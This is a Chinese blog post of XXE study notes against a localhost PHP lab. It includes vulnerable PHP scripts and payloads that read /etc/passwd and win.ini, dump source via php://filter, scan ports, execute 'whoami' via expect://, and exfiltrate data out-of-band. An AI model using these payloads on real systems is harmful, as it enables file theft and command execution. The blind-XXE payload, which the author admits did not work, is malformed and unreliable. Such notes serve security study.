XXE漏洞

最新推荐文章于 2024-04-02 10:22:58 发布
最新推荐文章于 2024-04-02 10:22:58 发布
阅读量240 收藏
点赞数
分类专栏: 暗月笔记 文章标签: php 服务器 apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rmc131/article/details/130141865
版权

XXE

XXE Injection,XML Enternal Entity Injection, 由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。 例如PHP中的simplexml_load 默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。

条件:libxml< 2.9.1原因是 libxml2.9.1及以后,默认不解析外部实体。

内部实体

程序中多用内部实体

<!ENTITY 实体名称"实体的值">
<?xml version="1.0" encoding="IOS"

外部实体

<!ENTITY 实体名称 SYSTEM "URI/URL">

例子:

xxe.php

<?php
$string_xml = '<?xml version="1.0" encoding="utf-8"?><note><to>George</to><from>John</from><heading>Reminder</heading><body>xml实体注入</body></note>';
$xml = isset($_GET['xml'])?$_GET['xml']:$string_xml;
$data = simplexml_load_string($xml);
echo  '<meta charset="UTF-8">';
print_r($data);
?>

xxe02.php

<?php
$xml = $_GET['xml'];
$data = simplexml_load_string($xml);
?>

有回显

都需要先url编码

http://127.0.0.1/xxe.php?xml=...

任意读取文件

Windows下
<?xml version="1.0"?><!DOCTYPE a [<!ENTITY b SYSTEM "file:///C:/Windows/win.ini">]><c>&b;</c>

linux下
<?xml version="1.0"?><!DOCTYPE a [<!ENTITY b SYSTEM "file:///etc/passwd">]><c>&b;</c>

php种利用伪协议读取文件

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xdsec [
<!ELEMENT methodname ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=phpinfo.php" >]>
<methodcall>
<methodname>&xxe;</methodname>
</methodcall>

扫描端口

<?xml version="1.0"?>
<!DOCTYPE ANY [<!ENTITY test SYSTEM "http://192.168.0.1:80">]>
<abc>&test;</abc>

执行命令

需开启expect扩展
<?xml version="1.0"?>
<!DOCTYPE ANY [<!ENTITY test SYSTEM "expect://whoami">]>
<abc>&test;</abc>

无回显

(未实现)

称为blind xxe可以使用外带数据通道 提取数据

http://127.0.0.1/xxe02.php?xml=<?xml version="1.0"?>
<!DOCTYPE ANY[
    <!ENTITY % file SYSTEM "file:///C:1.txt">
    <!ENTITY % remote SYSTEM "http://127.0.0.1/evil.xml">
    %remote;
    %all;
]>
<root>&send;</root>

ecil.xml内容

<!ENTITY %all "<!ENTITY send SYSTEM 'http://127.0.0.1/1.php?file;'>">

1.php

<?php file_put_contents("1.txt", $_GET['file']);?>
RICKC131
关注
专栏目录
XXE漏洞以及XXE漏洞如何修复
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-09 2万+
XXE漏洞是什么?XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。这些就称为XXE漏洞。知道XXE漏洞前首先得先了解XML。XXE漏洞如何修复的方案一:使用开发语言提供的禁用外部实体的方法1.PHP开发语言禁用外部实体的方法:libxml_disable_entity_loader(true);XXE漏洞如何修复的方案二:尽量不要让用户直接
XXE漏洞分析
jklbnm12的博客
09-17 465
0x01:知识准备 XXE即XML External Entity Injection,由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml\\\_load默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml\\\_load_string() XML实体分为四种:字符实体,命名实体,外部实体,参数实体 1、命名实体写法: <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE
XXE漏洞详解
weixin_59047731的博客
12-14 170
是可以控制的,因为就是前端传进来的post值,被GLOBALS解析了一下而已,同时传进来的值我们可以抓包进行控制。因为现在输入是可以控制的,所以我们只需要找可以产生回显点的地方,对应到代码,就是找输出数据的地方。因为我们在后续的代码中并没有发现任何输出点,所以这个时候就要尝试xxe的盲注。这里可以看出,id=1和id=2是同一个文件,就没必要重复查看了。id=4 id=5是同一个文件,同一个位置,查看一个即可。此时会发现是两条两条记录的出现,原因可以参考一下图片。双击进入id=3,出现错误,我们也不用管。
JAVA中XXE漏洞线索函数
zz_strive_2012的专栏
08-04 361
XXE审计函数 XML解析一般在导入配置、数据传输接口等场景可能会用到,涉及到XML文件处理的场景可查看XML解析器是否禁用外部实体,从而判断是否存在XXE。部分XML解析接口(常见漏洞出现函数)如下: ...
php xxe注入,PHP XXE漏洞
weixin_33764463的博客
03-10 512
PHP xml 外部实体注入漏洞(XXE)1.环境PHP 7.0.30Libxml 2.8.0Libxml2.9.0 以后 ,默认不解析外部实体,对于PHP版本不影响XXE的利用2.原理介绍XML 被设计为传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息,而 XML 旨在传输信息。XML特点,XML 被设计用来结构化、存储以及传输信息...
OWASP TOP 10(七)XXE漏洞(XML基本语法、DTD(声明类型、数据类型、实体)、XXE漏洞原理、PHP相关函数、XML注入读取文件、漏洞防御)
Pluto.的博客
12-27 756
文章目录XML学习一、XML概述1. 简述2. XML和HTML的区别二、基本语法规则三、DTD1. 概述2. 声明类型- 内部的 DOCTYPE 声明- 外部文档声明3. 数据类型- PCDATA- CDATA4. 实体- 内部实体声明- 外部实体声明四、XEE1. 漏洞原理2. PHP相关函数- file_get_contents()- php://input- simplexml_load_string()3. XML注入回显 输出函数 XML学习 一、XML概述 1. 简述 XML 指可扩展标记语言
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE漏洞主要出现在应用接收并解析XML格式的数据时。如果服务器开启了外部实体加载功能,攻击者可以通过构造含有恶意外部实体的XML文档,诱使服务器去读取或执行非预期的资源。比如,攻击者可以定义一个外部实体来...
105-web漏洞挖掘之XXE漏洞1
08-03
XXE漏洞详解】 XXE,全称为XML External Entity Injection,是XML解析器在处理XML输入时因未能正确配置,允许加载外部实体而导致的安全漏洞。这类漏洞允许攻击者注入恶意的XML外部实体,进而获取敏感信息、执行...
未知攻焉知防——XXE漏洞攻防.pdf
09-18
XXE漏洞全称为XML External Entity Injection,即XML外部实体注入漏洞,是一种在应用程序中处理XML数据时出现的安全漏洞。本文将详细介绍XML的基础知识、XXE漏洞的攻击原理、影响以及防御措施。 XML(可扩展标记...
xxe漏洞笔记
weixin_45653478的博客
03-25 739
1、什么是XML?XML 指可扩展标记语言(Extensible Markup Language) XML是一种标记语言,很类似 HTML XML 的设计宗旨是传输数据,而非显示数据。HTML 被设计用来显示数据。XML 标签没有被预定义。您需要自行定义标签。XML被设计为具有自我描述性。XML 是w3C的推荐标准。
(vulhub)PHP环境XML外部实体注入漏洞XXE
Gjqhs的博客
03-08 1064
Vulhub 靶场安装_Gjqhs的博客-CSDN博客 查询对应镜像 打开docker systemctl start docker 设置docker自启动 systemctl enable docker 查看docker状态 systemctl status docker 查找xxe镜像 docker search php_xxe 拉取镜像,(有可能超时,如下) 启动xxe服务 访问即可见此页面,可看到其版本为2.8.0。 http:...
Xxe漏洞 php,PhpSpreadsheet 1.5.0 XXE漏洞复现及分析
weixin_36337122的博客
03-16 565
0x01 前言PhpSpreadsheet是一个非常流行的纯 PHP 类库,能够让你方便的读写Excel、LibreOffic Calc等表格格式的文件,是PHPExcel的替代者。2018年11月13日,PhpSpreadsheet 被爆出存在XXE漏洞(CVE-2018-19277),在表格的解压文件中插入UTF-7编码的恶意xml payload,可绕过PhpSpreadsheet 库的安...
XXE技巧拓展】————5、XXE漏洞以及Blind XXE总结
Fly_鹏程万里
12-25 1099
前言 XXE漏洞是针对使用XML交互的Web应用程序的攻击方法,在XEE漏洞的基础上,发展出了Blind XXE漏洞。目前来看,XML文件作为配置文件(Spring、Struts2等)、文档结构说明文件(PDF、RSS等)、图片格式文件(SVG header)应用比较广泛,此外,网上有一些在线XML格式化工具也存在过问题,如开源中国的在线XML格式化工具XXE漏洞: http://www.wo...
XXE漏洞介绍及利用
热门推荐
星落的博客
06-11 1万+
XXE漏洞介绍 XXE全称为XML External Entity Injection即XMl外部实体注入漏洞XXE漏洞 XXE漏洞触发点往往是可以上传xmlwenjian的位置,没有对xml文件进行过滤,导致可加载恶意外部文件和代码,造成任意文件读取,命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害 XML介绍及用途 XMl被设计用来传输和存储数据。XML文档形成了一种树状结构,它从"根部"开始,然后扩展到"枝叶"。 XMl允许作者定义自己的标签和自己的文档结构。 XML.
【Java代码审计】XXE漏洞
最新发布
大河之犬的博客
04-02 1380
XXE 漏洞的原理主要是利用了 XML 解析器的实体引用特性。在 XML 中,可以使用实体引用来引用外部的实体,例如文件,以便在 XML 文档中重用内容。然而,如果 XML 解析器未经适当配置,可能会导致外部实体的任意读取和执行,从而引发安全漏洞。攻击者可以构造恶意的 XML 文件,其中包含对外部实体的引用,并通过将这个 XML 文件提交给目标应用程序来触发漏洞。当目标应用程序解析这个 XML 文件时,解析器会尝试读取和解析外部实体,从而使得攻击者能够访问本地或远程系统上的文件,并执行相关操作。
PHP环境 XML外部实体注入漏洞XXE
weixin_43886198的博客
12-21 695
PHP环境 XML外部实体注入漏洞XXE) 环境介绍: PHP 7.0.30 libxml 2.8.0 libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。为了演示PHP环境下的XXE漏洞,本例会将libxml2.8.0版本编译进PHP中。PHP版本并不影响XXE利用。 使用如下命令编译并启动环境: docker-compose up -d 环境启动后,访问http://your-ip:8080/index.php即可看到phpinfo,搜索libxml即可看到其版本为2.8.0
geoserver xxe漏洞
09-02
Geoserver是一个开源的地理信息系统(GIS)软件,它用于发布和共享地理数据和服务。然而,Geoserver在某些情况下可能存在一个称为XXE(XML外部实体)漏洞XXE漏洞是一种安全漏洞,攻击者可以利用该漏洞来读取本地或远程服务器上的文件。这种漏洞通常是由于应用程序在处理XML输入时,对外部实体的处理不当而引起的。 具体到Geoserver的XXE漏洞,它可能会受到XML实体注入攻击。攻击者可以通过向Geoserver发送包含恶意XML实体引用的请求,来读取系统上的敏感文件或执行任意代码。 为了防止Geoserver XXE漏洞的利用,有几个关键的步骤可以采取: 1. 更新Geoserver:确保您使用的是最新版本的Geoserver。开源软件的维护者通常会修复已知的漏洞,并在新版本中发布修复程序。 2. 安全的配置文件处理:确保Geoserver的配置文件中没有不必要的文件,因为攻击者可能会利用这些文件访问敏感信息。 3. 过滤和验证用户输入:在输入和输出时,对用户提交的XML数据进行充分验证和过滤。这将有助于防止输入的恶意XML实体被执行。 4. 强化安全意识:向Geoserver用户和管理员提供适当的培训,以提高他们对安全问题的意识。这将有助于减少社会工程学攻击和恶意操作。 总之,Geoserver XXE漏洞是一种可以利用的安全漏洞,但通过更新软件、安全配置文件处理、过滤验证用户输入和提高安全意识,可以有效地减少这种漏洞的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

RICKC131

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值